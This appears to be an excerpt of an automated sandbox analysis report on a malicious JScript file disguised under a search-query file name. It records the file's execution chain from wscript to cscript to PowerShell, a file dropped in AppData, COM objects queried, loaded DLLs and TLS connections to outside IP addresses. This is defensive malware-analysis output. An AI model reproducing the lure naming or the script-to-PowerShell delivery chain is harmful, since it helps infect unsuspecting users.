Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://github.com/mozilla/source-map/pull/31
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/dom.html#phrasing-content
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/embedded-content.html#attr-img-srcset
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/indices.html#elements-3
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#optional-tags
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#table-charref-overrides
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#table-charref-overrides.
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://kangax.github.io/html-minifier/)
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/demo/javascript-mime-type
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/notes/ambiguous-ampersands
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/notes/ambiguous-ampersands:
Source: does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mathiasbynens.be/notes/unquoted-attribute-values
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mths.be/he
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mths.be/notes/ambiguous-ampersands
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mths.be/punycode
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://mths.be/punycode.
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsString found in binary or memory: https://www.npmjs.com/package/ncname
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 50.116.62.225:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.38.249.148:443 -> 192.168.2.5:49713 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
Source: does virginia have a no chase law for motorcycles 62848.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal68.expl.evad.winJS@13/9@3/3
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Global Responsibility.datJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj4nk4sf.ocj.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js"
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE SOCIOL~1.JS
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE SOCIOL~1.JS
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"Jump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
